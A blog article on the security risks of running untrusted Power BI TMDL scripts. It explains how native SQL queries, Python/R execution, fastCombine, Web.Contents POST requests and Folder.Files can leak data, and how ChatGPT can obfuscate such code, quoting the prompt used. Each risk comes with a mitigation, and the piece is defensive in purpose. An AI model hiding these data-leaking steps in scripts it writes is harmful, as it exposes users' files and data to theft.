Register Log in

Power BI TMDL View: Benefits, Security Risks & Best Practices

An image showing Power BI running on a laptop.
Comments 0

Share to social media

The Tabular Model Definition Language (TMDL) provides a simpler way of defining Power BI Semantic Models. Unlike the JSON-based Tabular Model Scripting Language (TMSL), TMDL uses a more accessible tab-based format for specifying DAX measures, relationships, and Power Query code.

Example of TMDL format
Figure 1 – Example of TMDL format

Benefits of Using TMDL View

In January 2025, Microsoft introduced the TMDL View, which makes it easier for pro-code developers who use conventional programming languages with semantic models to share and reuse TMDL. With the click of the “Apply” button (see Figure 2), you can update the model. If you’ve ever had to update a Power Query function across multiple semantic models or dataflows, you know how time-consuming it can be, so this is a powerful new feature by comparison.

Updating your model in TDLM view with just the click of the 'Apply' button
Figure 2 – Updating your model in TDLM view with just the click of the ‘Apply’ button

This feature has led to the sharing of TMDL scripts on social media and the launch of sites like https://fabsnippets.com and the TMDL Gallery, where users exchange code and best practices. It highlights how active and generous the Power BI community is. 

However, with the introduction of TMDL View, I would caution the community about bad actors who might take advantage of that generosity.

Security Risks of TMDL Scripts

If you plan to use a TMDL script from another website or individual, you should treat it as untrusted code. Untrusted code can lead to data leakage or trigger updates to your systems without your immediate knowledge. 

As of July 2025, I’ve identified several risks associated with running a TMDL script in TMDL View that you should consider beforehand, along with mitigation techniques you can use to prevent any risk of a security breach.

SQL Injection via Native Queries

If you are working with SQL-based sources, there is a chance you have disabled the “Require user approval for new native database queries” setting (see Figure 3). This is a safety mechanism you may have turned off months ago, but when enabled, it prompts you with a message similar to the one shown in Figure 3.

If you apply a TMDL script in Power BI Desktop, it could contain SQL code that you do not want to execute. You can consider this a potential form of SQL injection within Power Query.

Screenshot of disabling user approval for native database queries
Figure 3 – Screenshot of disabling user approval for native database queries

This SQL injection can perform actions such as updating permissions, extracting sensitive data, or creating a user. 

Mitigation Technique

Turn on “Require user approval for new native database queries” before running the TMDL script in TMDL View. When this setting is enabled, you will see a message similar to Figure 4 before any native database queries are executed.

Example of security prompt in Power BI desktop, prompting if you want to run a native SQL script
Figure 4 – Example of security prompt in Power BI desktop, prompting if you want to run a native SQL script

You should also inspect the Power Query code for any database connection functions that include a Query argument, such as Sql.Database, Oracle.Database, Odbc.Query, and PostgreSQL.Database. The Query argument contains the script that will be executed against your database.

Python and R Execution Risks

You may not be aware that Python and R also depend on the “Native Database Queries” setting. When this setting is enabled, it will prompt you to confirm whether you want to execute the code. However, I often see this setting disabled for the sake of ‘psychological acceptability’ – the principle that security warnings should match user expectations. Unfortunately, that expectation is often to avoid them entirely. If you’re using Python or R in your Power BI Desktop files, you could accidentally allow code to execute that you did not intend. Python or R code can perform many actions on your machine and could even be used to extract information from your operating system that you may not want to allow (see example in Figure 5).

Example of Python code in Power Query
Figure 5 – Example of Python code in Power Query

Mitigation Technique

Turn on “Require user approval for new native database queries” before running the TMDL script in TMDL View and inspect the Power Query code for any use of R.Execute or Python.Execute.

Privacy Settings and Data Leakage

If you see the term “fastCombine” under a model in a TMDL script (see Figure 6), you should inspect it carefully as it is shorthand for setting the model to “Always ignore Privacy Level Settings.” This setting disables privacy checks that normally protect data when combining sources from different locations. For example, it can be useful when combining data from a public website with internal data for analysis. However, it could also be used to pull data from an Excel file and send it to a web service without your knowledge.

Example of fastCombine in TMDL Script
Figure 6 – Example of fastCombine in TMDL Script

Mitigation Technique

Remove fastCombine from the script and make sure the setting “Always combine data according to your Privacy Level settings for each source” is enabled under Global > Security > Privacy Levels. With these settings turned on, you will be prompted when data sources are combined and can deny any combinations you find suspicious.

Set Privacy levels to the most restrictive before running an untrusted TMDL script
Figure 7 – Set Privacy levels to the most restrictive before running an untrusted TMDL script

Web.Contents and External Data Transfers

Web.Contents is a powerful function that can access websites and application programming interfaces, but it can also send data outside your organization. For example, Figure 8 shows a TMDL script with a Web.Contents function that could upload data to an external endpoint. When Web.Contents uses the Content argument, it becomes a POST request, and you will be asked to connect via an anonymous connection the first time you make this connection on your machine.

Once established, you will not be asked to set up that connection again unless you clear the permissions in ‘data source settings’. While you may be prompted to connect anonymously, be cautious of domain spoofing, where the URL is crafted to look like a legitimate site. For instance, powerbi.com is a legitimate Microsoft site, but powerbì.com (with an accented ‘ì’) is not. You could be tricked into thinking you are connecting to a trusted site when in fact, you are sending data to a malicious one.

Example of Web.Contents performing a POST request
Figure 8 – Example of Web.Contents performing a POST request

Mitigation Technique

Make sure the setting “Always combine data according to your Privacy Level settings for each source” is enabled under Global > Security > Privacy Levels in Power BI Desktop. Inspect the TMDL script for the presence of Web.Contents and verify that it is performing legitimate data calls. If the Content parameter is used, scrutinize its use carefully, as anonymous connections sending data can be highly suspicious.

Folder.Files and Local File Access

Folder.Files allows you to access file contents on your machine but can also be used to retrieve sensitive documents from your computer.

Example of Folder.Files accessing a C Drive if executed
Figure 9 – Example of Folder.Files accessing a C Drive if executed

Mitigation Technique

Make sure the setting “Always combine data according to your Privacy Level settings for each source” is enabled under Global > Security > Privacy Levels in Power BI Desktop. Inspect the TMDL script for the presence of Folder.Files and ensure it is performing legitimate data calls.

Considerations

If you’re reading this and wondering how someone could miss those risks in a script, the answer lies in advances in obfuscation – the act of hiding a code’s purpose by making it confusing or hard to read.

Furthermore, with Large Language Models (LLM) like ChatGPT1 , it has become quite simple to obfuscate code or bury it between other steps. For example, in Figure 10, I have highlighted a Web.Contents call hidden inside code that generates a Calendar/Date dimension. In Figure 11, I simply asked an LLM model to hide the Python code that pulls files from a specific C drive. When a script is large or obfuscated, such code can easily be overlooked.

Example of Web.Contents placed between steps that build a Calendar/Date dimension table
Figure 10 – Example of Web.Contents placed between steps that build a Calendar/Date dimension table

Example of Python code obfuscated
Figure 11 – Example of Python code obfuscated

Hiding malicious code

It’s never been easier to share Power BI scripts online—but it has also never been easier to hide malicious behavior within them. 

With the rise of large language models, anyone can now generate long and realistic-looking Power Query scripts that include harmful code disguised among seemingly routine steps. These scripts might load a calendar table, sort data, or calculate metrics—while quietly sending data to an unknown website or accessing local files in the background. 

What’s especially concerning is that these steps can be hidden in plain sight. Obfuscated code can use misleading step names, redundant transformations, or string concatenation to mask its true purpose. And with AI-generated scripts becoming more common in developer forums and social media, it’s increasingly difficult to tell trusted code from tampered code at a glance. 

Stay safe. Don’t assume a script is safe just because it looks professional or comes from a well-meaning source. Always review the steps carefully, especially those involving functions like Web.Contents, Folder.Files, or Execute blocks for Python or R. 

If you’re unsure what a complex script is doing, it can help to use a tool—or even a language model—to explain the code rather than write it. Asking for a plain-language summary of each step is often enough to uncover suspicious behavior. 

Conclusion

We have a strong community in Power BI, and TMDL View offers a huge benefit to improve your development processes. However, you should be cautious about running TMDL scripts you find online without first inspecting their contents. Doing so will help protect your data and safeguard the community from bad actors.

Did I miss any security considerations? Let me know in the comments.

1 I used this simple prompt in ChatGPT: “Please obfuscate this Power Query Code denoted by ~~~ and remove comments”. 

Article tags

Load comments

Recommended

About the author

John Kerski has over a decade of experience in technical and government leadership. He specializes in managing Data Analytics projects and implementing DataOps principles to enhance solution delivery and minimize errors. John's expertise is showcased through his ability to offer patterns and templates that streamline the adoption of DataOps with Microsoft Fabric and Power BI. His in-depth knowledge and hands-on approach provide clients with practical tools to achieve efficient and effective data operations. Throughout his career, John has dedicated himself to helping Federal Agencies and private sector clients maximize their use of Microsoft products. His extensive experience and certifications with Microsoft solutions ensure that his clients receive a high rate of return on their investments.

John's contributions
John's latest contributions: